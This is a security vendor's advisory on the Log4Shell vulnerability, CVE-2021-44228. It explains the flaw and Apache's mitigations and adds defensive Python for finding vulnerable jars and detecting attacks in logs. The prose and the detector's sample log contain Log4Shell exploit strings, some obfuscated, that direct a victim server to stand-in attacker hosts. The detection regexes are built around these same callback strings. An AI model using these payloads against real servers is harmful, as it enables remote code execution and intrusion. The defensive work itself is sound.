Weekly CyberTip: What is an SBOM?
The emerging Apache Log4j vulnerability crisis underscores the importance of "software bills of materials" or SBOMs. An SBOM is a formal, machine-readable record of the components (including open-source and third-party libraries) that make up a piece of software, and of the dependency relationships between them. With an SBOM for the software used in your enterprise, you can quickly determine which applications include a vulnerable component when a vulnerability is announced, instead of searching every system by hand.
Critical Apache Log4j software vulnerability has global impacts
The cyber world is reeling from one of the most significant software vulnerabilities in years. Today’s CyberNews focuses on the Apache Log4j or “Log4Shell” vulnerability recently identified in the wild.
What happened with Apache Log4j software?
On Thursday, December 9, a proof-of-concept was published that demonstrated exploitation of a remote code execution (RCE) bug in Apache Log4j, the world's most widely used Java logging library. The vulnerability, tracked as CVE-2021-44228, has been given the highest possible CVSS score of 10.0: it can be exploited over the network without authentication or user interaction, and its ubiquity means the exposure is enormous. Log4j is used in countless systems around the world, including those from Microsoft, Amazon, Twitter, Apple iCloud, Cisco, Cloudflare, and more. A community-maintained list on GitHub of affected applications and services is growing by the hour.
Apache's description of the vulnerability reveals that "JNDI [Java Naming and Directory Interface] features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled." In practice this means that any attacker-supplied string an application logs (a username, a User-Agent or other HTTP header, a chat message) can carry a lookup such as ${jndi:ldap://attacker-host/object}; when Log4j writes the log entry, the lookup is resolved, the attacker's server is contacted, and the Java class it points to is loaded and executed on the victim. This "arbitrary code" could include instructions to download and execute further malicious payloads on targeted systems.
Threat actors are conducting widespread scanning across the Internet looking for potential targets for compromise. The first major reported infections involved servers for the popular online game Minecraft. Most successful breaches to date have resulted in threat actors deploying crypto-mining operations on compromised systems, but there is little doubt that a determined criminal enterprise could do far greater damage. Some organizations, including GO Transit and the Canada Revenue Agency, pre-emptively took their websites offline over the weekend to prevent attack while they investigated their exposure.
What recommendations does ISA Cybersecurity have for me?
Apache has released a fix for the vulnerability. We recommend that organizations evaluate and upgrade all affected systems to the current fixed release of Apache Log4j, version 2.15.0 (the rc2 build at the time of writing; the earlier rc1 build was found not to fix the vulnerability completely). Because Apache's guidance has been revised several times since disclosure, confirm the current fixed version against Apache's Log4j security advisory before deploying.
However, given how many places the library is used, either directly or embedded inside services and applications (including copies bundled inside application archives that dependency tooling does not see), patching may be difficult and time-consuming. Apache has issued guidance on mitigations to apply where immediate patching is unfeasible:
• In releases 2.10 through 2.14.1, this behaviour can be mitigated by setting either the system property "log4j2.formatMsgNoLookups" (for example, -Dlog4j2.formatMsgNoLookups=true on the JVM command line) or the environment variable "LOG4J_FORMAT_MSG_NO_LOOKUPS" to true. The application must be restarted for either setting to take effect.
• For releases from 2.7 to 2.14.1 inclusive, all PatternLayout patterns in every Log4j configuration file can be modified to specify the message converter as %m{nolookups} instead of just %m. Note that a single missed configuration or appender leaves that path exposed.
• For releases from 2.0-beta9 to 2.10.0 inclusive, the mitigation is to remove the JndiLookup class from the classpath, for example with: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class (this approach also works on later 2.x releases up to 2.14.1, and is the only option for versions below 2.10 that do not support the property above). Restart the application afterwards, since a running JVM keeps the old class loaded.
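The mitigations above only help for the log4j-core copies you know about, and the hardest ones to find are jars nested inside application archives. The following scanner is an added example (not ISA Cybersecurity's or Apache's code) that walks a directory tree, opens every jar/war/ear including nested archives, reads the version from Log4j's own pom.properties entry, checks for the JndiLookup class, and applies the class-removal mitigation. The class path, the pom.properties path and the 2.15.0 threshold come from Apache's advisory; the archives built by demo() are constructed stand-ins with placeholder bytes, not real Log4j jars.

```python
"""Inventory Log4j 2 jars under a directory tree, classify each against
CVE-2021-44228, and apply Apache's class-removal mitigation.

Added example, not ISA Cybersecurity's or Apache's code. The sample archives
built by demo() are constructed stand-ins for the demonstration."""
import io
import os
import re
import tempfile
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")
FIXED = (2, 15, 0)  # first fixed release per the advisory at time of writing


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0). Pre-release tags are
    dropped, which only matters below 2.15 where everything is vulnerable anyway."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)) if m else None


def classify(version, has_jndi):
    if version is not None and version >= FIXED:
        return "patched"
    return "vulnerable" if has_jndi else "mitigated (JndiLookup removed)"


def inspect_archive(zf, path):
    """Report log4j-core markers in one archive and recurse into nested archives
    (fat jars, WEB-INF/lib inside a war): the copies dependency scans miss."""
    names = set(zf.namelist())
    version = None
    if POM_PROPS in names:
        for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                version = parse_version(line.split("=", 1)[1].strip())
    has_jndi = JNDI_CLASS in names
    findings = []
    if version is not None or has_jndi:
        findings.append({"path": path, "version": version, "has_jndi": has_jndi,
                         "status": classify(version, has_jndi)})
    for name in names:
        if name.lower().endswith(ARCHIVE_EXT):
            try:
                inner = zipfile.ZipFile(io.BytesIO(zf.read(name)))
            except zipfile.BadZipFile:
                continue
            findings.extend(inspect_archive(inner, f"{path}!{name}"))
    return findings


def scan_tree(root):
    findings = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            if f.lower().endswith(ARCHIVE_EXT):
                full = os.path.join(dirpath, f)
                try:
                    with zipfile.ZipFile(full) as zf:
                        findings.extend(inspect_archive(zf, full))
                except zipfile.BadZipFile:
                    continue
    return sorted(findings, key=lambda x: x["path"])


def strip_jndi_lookup(jar_path):
    """Rewrite the jar without JndiLookup.class (same effect as Apache's
    zip -d command). Returns True if the class was present and removed.
    Restart the application afterwards: a running JVM keeps the old class."""
    tmp = jar_path + ".tmp"
    removed = False
    with zipfile.ZipFile(jar_path) as src, zipfile.ZipFile(tmp, "w") as dst:
        for item in src.infolist():
            if item.filename == JNDI_CLASS:
                removed = True
                continue
            dst.writestr(item, src.read(item.filename))
    os.replace(tmp, jar_path)
    return removed


def build_sample_jar(target, version, with_jndi=True):
    """Constructed stand-in for log4j-core: only the two entries the scanner reads."""
    with zipfile.ZipFile(target, "w") as zf:
        zf.writestr(POM_PROPS, "groupId=org.apache.logging.log4j\n"
                               f"artifactId=log4j-core\nversion={version}\n")
        if with_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # placeholder, not bytecode


def demo(workdir=None):
    """Scan constructed archives, mitigate the vulnerable jar, scan again."""
    workdir = workdir or tempfile.mkdtemp()
    vuln = os.path.join(workdir, "log4j-core-2.14.1.jar")
    build_sample_jar(vuln, "2.14.1")
    inner = io.BytesIO()
    build_sample_jar(inner, "2.15.0")  # patched copy hidden inside a war
    with zipfile.ZipFile(os.path.join(workdir, "app.war"), "w") as war:
        war.writestr("WEB-INF/lib/log4j-core-2.15.0.jar", inner.getvalue())

    def rel(f):
        return f["path"][len(workdir) + 1:]

    before = {rel(f): f["status"] for f in scan_tree(workdir)}
    removed = strip_jndi_lookup(vuln)
    after = {rel(f): f["status"] for f in scan_tree(workdir)}
    return before, removed, after


if __name__ == "__main__":
    for label, result in zip(("before", "removed", "after"), demo()):
        print(label, result)
```

Run it against a real tree with scan_tree("/opt") or similar; anything reported as "vulnerable" needs the upgrade or one of the mitigations above, and anything reported with version None but has_jndi True is a repackaged copy whose version must be checked by hand.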
ISA Cybersecurity also recommends a defense-in-depth strategy to protect your systems while you deploy patches to affected systems. This should start with the following actions:
• Ensure that your firewall and intrusion prevention signatures are up to date and set to block known Log4Shell exploit patterns (attempts to inject ${jndi: strings), and restrict outbound LDAP, RMI and similar connections from servers to the Internet, since the exploit depends on the victim connecting back to an attacker-controlled server;
• Ensure that your endpoint protection tools are up to date and set to block/remove malicious detections like crypto miners and other malware; and
• Ensure that all Internet-facing applications and services forward their logs to your internal IT team or SIEM to help monitor for anomalous behaviours. The attack string can arrive in any field the application logs (URL, User-Agent, other headers, form data), and attackers obfuscate it, so searches should cover all logged fields and not just the literal text "jndi".
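To make the last point concrete, here is an added example (not ISA Cybersecurity's or any vendor's detection logic) that scans web server access logs for Log4Shell attempts. It URL-decodes each line and resolves the nested lookups attackers use to hide the keyword (${lower:j}, ${upper:n}, ${::-j}, ${env:X:-j}) before matching ${jndi:, and reports the source address and callback host for blocking. The log lines in SAMPLE_LOG are constructed for this demonstration and use documentation IP ranges.

```python
"""Find Log4Shell exploit attempts in web access logs, including obfuscated
forms that defeat a naive search for the literal text "${jndi:".

Added example, not ISA Cybersecurity's or any vendor's code. SAMPLE_LOG is
constructed for the demonstration (documentation IP ranges)."""
import re
from urllib.parse import unquote

# Lookups attackers nest inside the payload so "jndi" never appears literally:
# ${lower:J} -> j, ${upper:n} -> N, ${env:NOPE:-j} -> j, ${::-j} -> j.
_LOWER = re.compile(r"\$\{\s*lower\s*:\s*([^{}]*)\}", re.I)
_UPPER = re.compile(r"\$\{\s*upper\s*:\s*([^{}]*)\}", re.I)
_DEFAULT = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
_JNDI = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldaps|ldap|rmi|dns|iiop|corba|nds|http)\s*:/*([^/}\s]+)",
    re.I)


def normalize(text):
    """Undo URL encoding (twice, for %2524-style double encoding) and resolve
    nested lookups from the inside out until nothing changes."""
    text = unquote(unquote(text))
    prev = None
    while prev != text:  # every pass removes at least one "${", so it terminates
        prev = text
        text = _LOWER.sub(lambda m: m.group(1).lower(), text)
        text = _UPPER.sub(lambda m: m.group(1).upper(), text)
        text = _DEFAULT.sub(lambda m: m.group(1), text)
    return text


def scan_log(lines):
    """One record per JNDI lookup found: line number, client address (first
    field of the combined log format), scheme and callback host."""
    hits = []
    for n, raw in enumerate(lines, 1):
        for m in _JNDI.finditer(normalize(raw)):
            hits.append({"line": n, "src": raw.split(" ", 1)[0],
                         "scheme": m.group(1).lower(), "target": m.group(2)})
    return hits


# Constructed sample: a benign request, then payloads in the User-Agent,
# the query string, a lookup built entirely from ${::-x} defaults, a
# URL-encoded payload, and a benign line that merely contains "jndi".
SAMPLE_LOG = """\
203.0.113.7 - - [10/Dec/2021:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Dec/2021:14:02:12 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.23:1389/Exploit}"
198.51.100.9 - - [10/Dec/2021:14:05:40 +0000] "GET /?x=${${lower:j}ndi:${lower:L}dap://attacker.example/a} HTTP/1.1" 404 0 "-" "curl/7.79"
198.51.100.9 - - [10/Dec/2021:14:05:41 +0000] "GET /login HTTP/1.1" 200 88 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://203.0.113.250/x}"
192.0.2.44 - - [10/Dec/2021:14:07:02 +0000] "GET /api?q=%24%7Bjndi%3Adns%3A%2F%2Ftoken.example%2Fa%7D HTTP/1.1" 200 5 "-" "python-requests/2.26"
192.0.2.5 - - [10/Dec/2021:14:09:00 +0000] "POST /search HTTP/1.1" 200 32 "-" "Mozilla/5.0 (compatible; jndi-user)"
"""

if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG.splitlines()):
        print(f"line {h['line']}: {h['src']} -> {h['scheme']}://{h['target']}")
```

A hit only shows that an attempt was logged, not that it succeeded; correlate the callback host with outbound connection logs or DNS queries from the server to confirm exploitation. Resolving lookups before matching is also the reason a single literal-string signature is insufficient.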
Many cybersecurity vendors are providing specific guidance to help mitigate the risks using their products. For example:
• McAfee has provided a summary of its own analysis of its products, in addition to updating defenses for its endpoint security, virus scanning, and web gateway products;
• Check Point has updated protections to its Quantum firewall products to detect and filter attacks;
• Tenable has released updated scan templates and plug-ins to help its clients detect vulnerable Log4j instances;
• Palo Alto Networks has issued analysis, guidance, and updated protections;
• Cloudflare is introducing filtering to block attempted exploits; and
• Microsoft has published guidance for preventing, detecting, and hunting Log4j-related attacks.
The governments of Canada (via the CCCS) and the United States (via CISA) have also issued official alerts regarding the vulnerability.
Further questions?
ISA Cybersecurity will continue to monitor the situation, keeping abreast of the rapidly evolving indicators of attack exploiting this vulnerability, as well as any updates from Apache and our extensive cybersecurity ecosystem. We will advise our customers of any relevant updates as they become available.
If you have further questions, or require immediate assistance or guidance in assessing your exposure, please do not hesitate to contact us to discuss any concerns. We are here to help.